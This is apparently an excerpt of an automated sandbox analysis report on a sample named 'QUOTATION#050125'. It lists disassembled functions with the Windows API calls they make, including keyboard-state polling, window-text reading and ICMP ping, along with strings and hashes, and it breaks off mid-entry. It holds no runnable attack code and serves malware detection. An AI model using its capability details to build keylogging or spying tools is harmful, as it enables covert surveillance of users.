GetLastError.KERNEL32(00000000), ref: 0050B407
CloseHandle.KERNEL32(?), ref: 0050B439
CloseHandle.KERNEL32(00000000), ref: 0050B44A
CloseHandle.KERNEL32(00000000), ref: 0050B45C
CloseHandle.KERNEL32(00000000), ref: 0050B46E
CloseHandle.KERNEL32(?), ref: 0050B4E3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Handle$Close$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 3101636085-0
Opcode ID: ffabcc98e6f8cde999ec64c4cc5e7464455ffdf87674d60b32374eb702923a57
Instruction ID: 4646bfe15685782f3f5edb4ff5eeffb6374bbb1c4a5e292e75a85f15a6a4950d
Opcode Fuzzy Hash: ffabcc98e6f8cde999ec64c4cc5e7464455ffdf87674d60b32374eb702923a57
Instruction Fuzzy Hash: A5F1BC316083409FDB14EF25C891B6EBBE5BF85318F14885EF8959B2A2CB35EC44CB56

Function 004F7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004F7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004F7B8F
SHGetDesktopFolder.SHELL32(?), ref: 004F7BA3
CoCreateInstance.OLE32(0051FD08,00000000,00000001,00546E6C,?), ref: 004F7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004F7C74
CoTaskMemFree.OLE32(?,?), ref: 004F7CCC
SHBrowseForFolderW.SHELL32(?), ref: 004F7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004F7D7A
CoTaskMemFree.OLE32(00000000), ref: 004F7D81
CoTaskMemFree.OLE32(00000000), ref: 004F7DD6
CoUninitialize.OLE32 ref: 004F7DDC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 89dc584ce1e73b5c291a925499277576d43b7e702344446816363ec6b88b02ca
Instruction ID: d39c55fe3a6da2a9837b984a4747500b53afa1685457fb04c4fa18dda569b685
Opcode Fuzzy Hash: 89dc584ce1e73b5c291a925499277576d43b7e702344446816363ec6b88b02ca
Instruction Fuzzy Hash: B6C15B75A04109AFCB04DFA4C888DAEBBF9FF48308B148499E91ADB361D735ED45CB94

Function 0051541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00515504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00515515
CharNextW.USER32(00000158), ref: 00515544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00515585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0051559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005155AC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 4117ed5dcc6b522cee2c0b2d6e54bd8d05d2f2c65254eff4718a312656f5ab67
Instruction ID: 14becc73ebd4c80f18c77271b4ef1b2fced52bd93d8c87366034db9009c10dbd
Opcode Fuzzy Hash: 4117ed5dcc6b522cee2c0b2d6e54bd8d05d2f2c65254eff4718a312656f5ab67
Instruction Fuzzy Hash: 0F61BF34900608EFEF108F54CC84AFE3FB9FB99320F108545F925AA290E7748AC4DB61

Function 004DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004DFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 004DFB08
VariantInit.OLEAUT32(?), ref: 004DFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 004DFB3A
VariantCopy.OLEAUT32(?,?), ref: 004DFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 004DFBA1
VariantClear.OLEAUT32(?), ref: 004DFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 004DFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004DFBCC
VariantClear.OLEAUT32(?), ref: 004DFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004DFBE9

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: a2fd97e22d252b7d11c90bf294a402e5d112afe679a88823152bc7ae70328811
Instruction ID: c946238b912f1d8c0d93054f26f59efdbf51690c9a6b5140ae1544e68d50814b
Opcode Fuzzy Hash: a2fd97e22d252b7d11c90bf294a402e5d112afe679a88823152bc7ae70328811
Instruction Fuzzy Hash: E4418234A002199FCF10DF64D8649EEBFB9EF18345F00806BE906A7361D775A949CB94

Function 004E9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004E9CA1
GetAsyncKeyState.USER32(000000A0), ref: 004E9D22
GetKeyState.USER32(000000A0), ref: 004E9D3D
GetAsyncKeyState.USER32(000000A1), ref: 004E9D57
GetKeyState.USER32(000000A1), ref: 004E9D6C
GetAsyncKeyState.USER32(00000011), ref: 004E9D84
GetKeyState.USER32(00000011), ref: 004E9D96
GetAsyncKeyState.USER32(00000012), ref: 004E9DAE
GetKeyState.USER32(00000012), ref: 004E9DC0
GetAsyncKeyState.USER32(0000005B), ref: 004E9DD8
GetKeyState.USER32(0000005B), ref: 004E9DEA

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8bd02525bc8d5765d139948642c55c617d4ccd19fb9b4843da2eed7e9f4bd9a0
Instruction ID: ae604bd020dda6e6c71e5c4eba8064013d316bdadc72a42d7f82dd41f7bbee64
Opcode Fuzzy Hash: 8bd02525bc8d5765d139948642c55c617d4ccd19fb9b4843da2eed7e9f4bd9a0
Instruction Fuzzy Hash: FC41F6305047CA69FF30976688047F7BEA16F21305F08805BCAC6567C2DBAD9DC8C7AA

Function 004E30F7 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 400COMMON

Download Yara Rule

Strings

INSTANCE, xrefs: 004E3453
TEXT, xrefs: 004E347C
NAME, xrefs: 004E3335, 004E3346
CLASS, xrefs: 004E3188, 004E31A5
[T, xrefs: 004E339A
CLASSNN, xrefs: 004E31F3, 004E3204
REGEXPCLASS, xrefs: 004E3255, 004E3266

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[T
API String ID: 0-2352530067
Opcode ID: 0038301c503d1cb5c9a5bd50a4b7a5ef8e48eb8f318cd3a0a9db790eaf3254a0
Instruction ID: af36d9620506a9d9f867dfb54bcf9656ea58f93b8b7b4f1ec0be68b8f7a1aef1
Opcode Fuzzy Hash: 0038301c503d1cb5c9a5bd50a4b7a5ef8e48eb8f318cd3a0a9db790eaf3254a0
Instruction Fuzzy Hash: 1FE13632A00556ABCB16DF76C449BEEFBB0BF54706F14812BE456A3380DB38AE458794

Function 004F44C0 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0051CC08), ref: 004F4527
GetDriveTypeW.KERNEL32(?,00546BF0,00000061), ref: 004F4743

Strings

ramdisk, xrefs: 004F46F1
unknown, xrefs: 004F4708
network, xrefs: 004F469D, 004F46A2
cdrom, xrefs: 004F458F, 004F4594
all, xrefs: 004F4531, 004F4536
fixed, xrefs: 004F4635, 004F463A
removable, xrefs: 004F45EA, 004F45EF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2426244813-1000479233
Opcode ID: d92ce86ca37dbcd2da3e4e31366e709aed9638700db83f13c571ae3558ca61e6
Instruction ID: 33b2ff9869b83c8d90496984d800cf23b12360fd2ed9eb2b4144c7a3551ecc00
Opcode Fuzzy Hash: d92ce86ca37dbcd2da3e4e31366e709aed9638700db83f13c571ae3558ca61e6
Instruction Fuzzy Hash: 07B10F316083029BC710EF28C890A7FB7E4AFE6728F10491EF296C7291DB38D845CB56

Function 004E4954 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 004E4994
GetWindowTextW.USER32(?,?,00000400), ref: 004E49DA
CharUpperBuffW.USER32(?,00000000), ref: 004E49F7
GetClassNameW.USER32(00000018,?,00000400), ref: 004E4A64
GetWindowTextW.USER32(?,?,00000400), ref: 004E4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 004E4AE6
GetClassNameW.USER32(?,?,00000400), ref: 004E4B20
GetWindowRect.USER32(?,?), ref: 004E4B8B

Strings

ThumbnailClass, xrefs: 004E4A6F, 004E4AF1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper
String ID: ThumbnailClass
API String ID: 3725905772-1241985126
Opcode ID: 02eed2fd1be29c27cb4859a8232ed2a95d576bd126c0c7280e13486a633766fc
Instruction ID: 72d4b2e5719efa8de1836c3fcacfb919672cf2fa8ba374e5ddee8c0d82b7e43b
Opcode Fuzzy Hash: 02eed2fd1be29c27cb4859a8232ed2a95d576bd126c0c7280e13486a633766fc
Instruction Fuzzy Hash: E891ED310042459FDB04DF16C984BAB7BE8FF84315F04846EFD859A296EB38ED45CBA9

Function 0050055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 005005BC
inet_addr.WSOCK32(?), ref: 0050061C
gethostbyname.WSOCK32(?), ref: 00500628
IcmpCreateFile.IPHLPAPI ref: 00500636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005006C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005006E5
IcmpCloseHandle.IPHLPAPI(?), ref: 005007B9
WSACleanup.WSOCK32 ref: 005007BF

Strings

Ping, xrefs: 00500676

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: b4f8fb742429f5cfe640b79df07e5fbcce535ed76523c170971f85a9d8835922
Instruction ID: 262c2459848996a5d51baefdb8ea956d20e76a8b034d95067d5736848e9ff818
Opcode Fuzzy Hash: b4f8fb742429f5cfe640b79df07e5fbcce535ed76523c170971f85a9d8835922
Instruction Fuzzy Hash: 34916A35608201AFD720DF15C888B1ABFE0FF49318F1499A9E46A8B6E2C775ED45CF91

Function 0050372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00503774
CoUninitialize.OLE32 ref: 0050377F
CoCreateInstance.OLE32(?,00000000,00000017,0051FB78,?), ref: 005037D9
IIDFromString.OLE32(?,?), ref: 0050384C
VariantInit.OLEAUT32(?), ref: 005038E4
VariantClear.OLEAUT32(?), ref: 00503936

Strings

Invalid parameter, xrefs: 00503865
NULL Pointer assignment, xrefs: 0050381E
Failed to create object, xrefs: 005037E4, 0050389A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 817f036f7971957b52d765a899a54f1857f4a181a4e86486cb0a522f9e6f2d53
Instruction ID: 995310516a519639456ab24e052fcce2e3183f084670b9b8aa1d6e42c1533d77
Opcode Fuzzy Hash: 817f036f7971957b52d765a899a54f1857f4a181a4e86486cb0a522f9e6f2d53
Instruction Fuzzy Hash: 37617970608701AFD310DF55C888B6EBBE8FF48714F10485AF9859B291C770EE48CB96

Function 004EDC0E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004EDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004EDC46
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004EDCBC

Strings

04090000, xrefs: 004EDCF2
DefaultLangCodepage, xrefs: 004EDD1F
StringFileInfo\, xrefs: 004EDC8F
\VarFileInfo\Translation, xrefs: 004EDCB4
%u.%u.%u.%u, xrefs: 004EDD9A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 2179348866-1459072770
Opcode ID: 74660e95ca93ebcfda025561d7025e114cd1ce930b3d2614e13045232f587290
Instruction ID: c23b8a706b19e11d3ef96877ea598b48c9593d4b5c3c39190e537f02c895b515
Opcode Fuzzy Hash: 74660e95ca93ebcfda025561d7025e114cd1ce930b3d2614e13045232f587290
Instruction Fuzzy Hash: B7413772A402007ADB00A7768C07EFF7BACEF66754F10006FF900E6182EB79990197AD

Function 00518B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

Part of subcall function 0049912D: GetCursorPos.USER32(?), ref: 00499141
Part of subcall function 0049912D: ScreenToClient.USER32(00000000,?), ref: 0049915E
Part of subcall function 0049912D: GetAsyncKeyState.USER32(00000001), ref: 00499183
Part of subcall function 0049912D: GetAsyncKeyState.USER32(00000002), ref: 0049919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00518B6B
ImageList_EndDrag.COMCTL32 ref: 00518B71
ReleaseCapture.USER32 ref: 00518B77
SetWindowTextW.USER32(?,00000000), ref: 00518C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00518C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00518CFF

Strings

@GUI_DRAGFILE, xrefs: 00518C9A
p#U, xrefs: 00518C71
@GUI_DROPID, xrefs: 00518C51

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#U
API String ID: 1924731296-1736870230
Opcode ID: dff3a37b3e5cee853ad0b180bcf4f0d31eb4b59311e9c3073f1c3b55649d24f5
Instruction ID: ab1a3c55fede2435334b8afefd7ea0bf5dc03833da6007731f1ec75c5e460331
Opcode Fuzzy Hash: dff3a37b3e5cee853ad0b180bcf4f0d31eb4b59311e9c3073f1c3b55649d24f5
Instruction Fuzzy Hash: 3A518D70104304AFE710EF14D85ABAE7BE4FB88719F00092EF956572E1CB759D48CBA6

Function 004F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004F33CF
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004F33F0

Strings

"%s" (%d) : ==> %s:, xrefs: 004F3522
^ ERROR , xrefs: 004F349E
Incorrect parameters to object property !, xrefs: 004F34AB
Error: , xrefs: 004F34D1
Line %d (File "%s"):, xrefs: 004F3443, 004F345C
"%s" (%d) : ==> %s:%s%s, xrefs: 004F3504

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LoadString
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 2948472770-3080491070
Opcode ID: dd0953e2514c50a3e4ad7b4d759b0e791f25fd4affbb2f3805b35a0665ae3138
Instruction ID: c1e56c002ed169b1360ba8c09f0ce74959808345d64e1447a6b3d795bdeec049
Opcode Fuzzy Hash: dd0953e2514c50a3e4ad7b4d759b0e791f25fd4affbb2f3805b35a0665ae3138
Instruction Fuzzy Hash: F551E131800609BADF04FBA1CD52EFEB778AF14749F14486AF50572092EB392F58DB69

Function 004F5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004F53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004F5416
GetLastError.KERNEL32 ref: 004F5420
SetErrorMode.KERNEL32(00000000,READY), ref: 004F54A7

Strings

INVALID, xrefs: 004F5459
READONLY, xrefs: 004F5452
READY, xrefs: 004F5460, 004F5468
UNKNOWN, xrefs: 004F5444
NOTREADY, xrefs: 004F544B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 9a5b60785c2ff33aca419b20f38492446947347db7199203cc5d5dee0333907c
Instruction ID: c5ee443a1fff4c40e6b4c5e2bf8f23b023dd03b09dec0115a3b03f38ea9f7430
Opcode Fuzzy Hash: 9a5b60785c2ff33aca419b20f38492446947347db7199203cc5d5dee0333907c
Instruction Fuzzy Hash: 78319D35A006099FC710DF68C484BFABBB4FB45309F14806AE605CB392D739DD86CBA5

Function 00513C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00513C79
SetMenu.USER32(?,00000000), ref: 00513C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00513D10
IsMenu.USER32(?), ref: 00513D24
CreatePopupMenu.USER32 ref: 00513D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00513D5B
DrawMenuBar.USER32 ref: 00513D63

Strings

0, xrefs: 00513C54
F, xrefs: 00513D4E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ebe82c247545cdd72da97d97cb63b360a58b92388c24050a048a24adf8cd3a8f
Instruction ID: 198dcf37c6ac85618d34e5508b51548a47613a27830e45f62841dab340d36a87
Opcode Fuzzy Hash: ebe82c247545cdd72da97d97cb63b360a58b92388c24050a048a24adf8cd3a8f
Instruction Fuzzy Hash: 12419A74A01209AFEB10DFA4E894AEA7FB6FF59344F044029E90697360D771AA14DB94

Function 004E1EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004E3CCA

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 004E1F64
GetDlgCtrlID.USER32 ref: 004E1F6F
GetParent.USER32 ref: 004E1F8B
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E1F8E
GetDlgCtrlID.USER32(?), ref: 004E1F97
GetParent.USER32(?), ref: 004E1FAB
SendMessageW.USER32(00000000,?,00000111,?), ref: 004E1FAE

Strings

